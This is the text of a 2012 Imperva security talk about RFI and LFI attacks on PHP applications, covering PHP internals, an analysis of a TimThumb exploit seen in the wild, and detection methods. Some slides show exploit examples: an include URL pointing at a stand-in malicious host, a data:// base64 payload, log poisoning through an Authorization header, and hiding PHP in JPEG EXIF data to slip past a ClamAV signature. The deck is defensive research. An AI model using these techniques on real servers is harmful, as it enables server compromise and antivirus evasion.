Download - How to Prevent RFI and LFI Attacks
![Page 1: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/1.jpg)
How to Prevent Remote & Local File Inclusion Attacks
Tal Be’ery Web Security Research Team Leader, Imperva
![Page 2: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/2.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Web Security Research Team Leader at Imperva Holds MSc & BSc degree in CS/EE from TAU 10+ experience in the IS domain Facebook “white hat” Speaker at RSA, BlackHat, AusCERT
Tal Be’ery, CISSP
![Page 3: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/3.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
PHP Background and Internals RFI Insight
+ Analysis of TimThumb shell “caught in the wild” + Advanced RFI using PHP streams and Wrappers
LFI Insight + Innovative method for editing file content to embed PHP code
and evade AV detection + Novel detection method
RFI and LFI in the Wild + New detection method using community based reputation data
Questions and Answers
3
Contents
![Page 4: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/4.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
PHP is everywhere Exploiting PHP’s include vulnerabilities with RFI LFI
attacks leads to full server takeover Hackers are actively attacking organizations
+ TimThumb exploit reportedly compromised 1.2 million pages
And yet.. + OWASP Top 10 in 2007 (#3)
+ Dropped in 2010
RFI, LFI - Under the Radar
![Page 5: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/5.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
The most popular server-side programming language in the world!
Breadth and Depth of PHP
![Page 6: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/6.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Popular Web applications are powered by PHP
Breadth and Depth of PHP
![Page 7: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/7.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
PHP’s parser starts on HTML mode
Ignores everything until it hits a PHP's opening tag
+ typically “<?php”, but also “<?”
PHP code is now parsed and compiled
When parser hits a closing tag (“?>”), it drops back to HTML mode
Allows “mixed” coding
PHP Internals - Parser HTML Mode
![Page 8: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/8.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Parsing • Code is converted into tokens (Lexing)… • Tokens are processed into meaningful expressions
(Parsing).
Compiling • Derived expressions are converted into OpCodes.
Execution • OpCodes are executed by the PHP engine.
8
PHP Internals - PHP Execution Steps
![Page 9: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/9.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Vulcan Logic Disassembler
PHP Extension • http://pecl.php.net/
package/vld • Maintainers - Derick
Rethans (lead)
Dumps the OpCodes of complied
PHP scripts
Code is compiled but not executed
9
PHP Internals - Disassembling with VLD Extension
![Page 10: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/10.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
PHP Internals - VLD Analysis Demo
Compile
![Page 11: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/11.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
The include() statement includes and evaluates the specified file
Used to share code by reference PHP Version >=4.3
+ Remote files (http://) are valid include targets
The parser drops to HTML mode at the beginning of the included file
PHP internals - Include()
![Page 12: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/12.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Meet Eval()’s hungry sister – include() Not only does she evaluate arbitrary code She eats everything before code
+ HTML mode - Code can be prepended with anything (including binary content)
She loves dining out + Code can reside outside of the application
And You Thought Eval() is Evil…
![Page 13: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/13.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Simple vulnerable app for warm up
Exploit:
+ http://www.vulnerable.com/test.php?file=http://www.malicious.com/shell.txt
RFI Exploitation
![Page 14: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/14.jpg)
© 2012 Imperva, Inc. All rights reserved.
RFI in the Wild
14
![Page 15: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/15.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Hackers Intelligence Initiative (HII) + Initiated in 2010 + Goes deep inside the cyber-underground and provides analysis
of trending hacking techniques and attack campaigns in real time
+ Includes honey pots consisting of 40 Web applications + Analyzes security logs
Hacker Intel – Observations in the Wild
![Page 16: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/16.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
TimThumb - + A WordPress extension to produce thumbnails of images + Vulnerable to RFI + 1.2 million exploited pages
RFI in the Wild - TimThumb
![Page 17: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/17.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Shell host - picasa.com.moveissantafe.com + Evaded TimThumb filter that allowed inclusion only from limited
set of hosts + The implemented host check mistakenly allowed
“picasa.com.moveissantafe.com” to pass as “picasa.com”
Started with a GIF file identifier, but then switched to encoded PHP
+ Evaded another TimThumb security filter used to verify that the file was indeed a valid picture
TimThumb Exploit Analysis
![Page 18: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/18.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Execution was controlled with additional HTTP parameters + LOL and OSC
TimThumb Exploit Analysis, Continued
![Page 19: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/19.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Execution was controlled with additional HTTP parameters + LOL and OSC
TimThumb Exploit Analysis, Continued
![Page 20: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/20.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Execution was controlled with additional HTTP parameters + LOL and OSC
TimThumb Exploit Analysis, Continued
![Page 21: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/21.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Execution was controlled with additional HTTP parameters + LOL and OSC
TimThumb Exploit Analysis, Continued
![Page 22: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/22.jpg)
© 2012 Imperva, Inc. All rights reserved.
Advanced RFI with PHP Streams
22
![Page 23: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/23.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Streams are a way of generalizing file, network, data compression, and other operations
Examples: + Accessing HTTP(s) URLs - http:// https:// + Accessing FTP(s) URLs - ftp:// ftps:// + Data ( RFC 2397) - data:// + Accessing local filesystem - file:// + Accessing various I/O streams - php:// + Compression Streams - zlib:// , bzip2:// , zip://
Advanced RFI with PHP Streams
![Page 24: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/24.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Hacker’s objective + Run the following code <?php phpinfo(); ?> on RFI vulnerable
app
Degree of difficulty + No shell hosting is allowed
Means + Bare hands
RFI PHP Streams
![Page 25: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/25.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
base64(“<?php phpinfo()?>”) = "PD9waHAgcGhwaW5mbygpPz4="
Wrapped in data wrapper: + "data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4="
RFI PHP Streams - Attack Example
![Page 26: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/26.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
RFI PHP Streams - Attack Example, Continued
![Page 27: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/27.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
RFI PHP Streams - Attack Example, Continued
Mission Accomplished!
![Page 28: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/28.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
To evade security filters + Many filters look only for exploits with the standard protocols
To hide attack source + Shell URL obfuscation (compressed, base64)
To compromise without a hosted shell + Using data wrapper
PHP Streams - Why Hackers Use Them
![Page 29: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/29.jpg)
© 2012 Imperva, Inc. All rights reserved.
Local File Inclusion
29
![Page 30: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/30.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
LFI – malicious code must be stored locally Extra work – why bother? Because RFI is disabled by default
+ PHP version 5.2: allow_url_include = off + ~ 90% PHP deployments versions >=5.2
LFI - Why Hackers Use It
![Page 31: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/31.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Abuse existing file write functionality within the server – log files
Abuse file upload functionality to embed malicious code within the uploaded file
Let’s demo it…
LFI - How to be Local
![Page 32: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/32.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Hacker’s objective + Run the following code <?php phpinfo(); ?>
Degree of difficulty + allow_url_include = off, code must be local
Means + Proxy (or any other way to edit HTTP headers)
LFI - Attacking Logs
![Page 33: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/33.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Authorization: Basic base64(user:pass) = Authorization: Basic base64(<?php phpinfo()?>:123456) = Authorization: Basic PD9waHAgcGhwaW5mbygpPz46MTIzNTY=)
LFI - Attacking Logs Example
![Page 34: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/34.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
LFI - Attacking Logs Example, Continued
![Page 35: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/35.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
LFI - Attacking Logs Example, Continued
Mission Accomplished!
![Page 36: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/36.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Hacker’s objective + Upload a picture with known malicious code to create LFI
Degree of difficulty + Picture appearance must not change + AV must not detect the code
Means + Bare hands
LFI - Abusing Upload
![Page 37: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/37.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
Prints FeeLCoMz twice Found in the wild Detected by AVs
LFI – Abusing Upload Example Initial PHP Code
![Page 38: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/38.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Picture – jpg format Editing EXIF properties
LFI – Abusing Upload Example Embedding Code in Picture, Phase I
![Page 39: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/39.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Picture – jpg format Editing EXIF properties
LFI – Abusing Upload Example Embedding Code in Picture, Phase I
Better… But not good enough!
![Page 40: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/40.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Let’s split the vector across two adjacent properties
LFI – Abusing Upload Example Embedding Code in Picture, Phase II
![Page 41: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/41.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Let’s split the vector across two adjacent properties
LFI – Abusing Upload Example Embedding Code in Picture, Phase II
Better… But not good enough!
![Page 42: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/42.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Now it gets personal ClamAV signature PHP.Hide-
1:0:0:ffd8ffe0?0104a464946{-4000}3c3f706870(0d|20|0a)
3c3f706870 is hex for <?php. Maybe changing the case will work…
LFI – Abusing Upload Example Embedding Code in Picture, Phase III
![Page 43: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/43.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Hacker’s objective + Upload a picture with known malicious code to create LFI
Degree of difficulty + Picture appearance must not change + AV must not detect the code
LFI – Abusing Upload Example, Recap
![Page 44: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/44.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Hacker’s objective + Upload a picture with known malicious code to create LFI
Degree of difficulty + Picture appearance must not change + AV must not detect the code
LFI – Abusing Upload Example, Recap
![Page 45: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/45.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Hacker’s objective + Upload a picture with known malicious code to create LFI
Degree of difficulty + Picture appearance must not change + AV must not detect the code
LFI – Abusing Upload Example, Recap
Mission Accomplished!
![Page 46: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/46.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
General purpose AVs search only for malicious code. + In the context of LFI exploit detection we are OK with detecting
files containing any PHP code.
General purpose AVs are built to find compiled malicious code.
+ Finding malicious source code requires a different set of features and awareness to text related evasions.
LFI – Abusing Upload - Why AV Fails
![Page 47: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/47.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Anti Virus - we just witnessed how they fail at this task Degenerated PHP parser - Looks only for PHP begin/end
tokens. + Looks for short tags (<\?.*\?>) - many false positives
Compile the uploaded file and check if it compiles + Even benign documents are (trivially) compiled
Run the file and see if it executes – hmm…
LFI - Abusive File Upload Misdetection
![Page 48: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/48.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
VLD it! + Compile the file with VLD + Inspect the OpCodes + No execution
A non-PHP code bearing files will yield only two OpCodes + ECHO – to print the non PHP code + RETURN – to return after the “execution”
LFI - Abusive Upload File Detection
![Page 49: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/49.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
LFI - Abusive File Detection with VLD Demo
![Page 50: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/50.jpg)
© 2012 Imperva, Inc. All rights reserved.
RFI, LFI in the Wild
50
![Page 51: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/51.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Very relevant + 20% of all Web application attacks
LFI is more prevalent than RFI + 90% of PHP deployments are of versions that do not allow RFI
by default
RFI, LFI in the Wild
![Page 52: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/52.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Highly automated Consistent attackers
RFI in the Wild - Sources Analysis
![Page 53: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/53.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Many sources attack more than one target
RFI in the Wild - Sources Analysis
![Page 54: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/54.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Obtaining shell hosting URLs:btaining shell hosting URLs: 1. Analyze Honey pot’s RFI Security Log entry
http://www.vulnerable.com/test.php?file=http://www.malicious.com/shell.txt
2. Download the shell - wget http://www.malicious.com/shell.txt
3. Verify it’s a script – to refrain from false positives
RFI in the Wild - Shell Hosting URLs Analysis
![Page 55: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/55.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Some URLs are being used consistently
RFI in the Wild - Shell Hosting URLs Analysis
![Page 56: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/56.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Many shell URLs are used against more than one target
RFI in the Wild - Shell Hosting URLs Analysis
![Page 57: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/57.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Attack characteristics (source, Shell URL) + Non transient – stable for days + General - not confined to a single honey pot
By forming a community that shares RFI data we can create black lists
+ Attack sources + Attackers’ shell hosting URLs
Achieve better protection!
A New Approach - Community Based RFI Black Lists
![Page 58: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/58.jpg)
© 2012 Imperva, Inc. All rights reserved.
Additional Resources
58
![Page 59: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/59.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Subscribe to Imperva’s Hacker Intelligence Initiative (HII):
+ Sign up to stay informed on all the latest attacks and hacking techniques
Download HII RFI Resources: + Report: Remote File Inclusion (RFI)
Vulnerabilities 101 + Infographic: Exploiting RFI Attacks 101
59
Hacker Intelligence Initiative
![Page 60: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/60.jpg)
© 2012 Imperva, Inc. All rights reserved.
© 2012 Imperva, Inc. All rights reserved.
Presentation Materials
Post-Presentation Discussions
Answers to Attendee Questions
Link to Presentation
Audio
Link to Presentation
Slides
Join Imperva’s LinkedIn Group Data Security Direct for…
http://www.linkedin.com/groups/Imperva-Data-Security-Direct-3849609
![Page 61: How to Prevent RFI and LFI Attacks](https://reader034.vdocuments.mx/reader034/viewer/2022050817/55525e34b4c905d41d8b4ae3/html5/thumbnails/61.jpg)
www.imperva.com
- CONFIDENTIAL -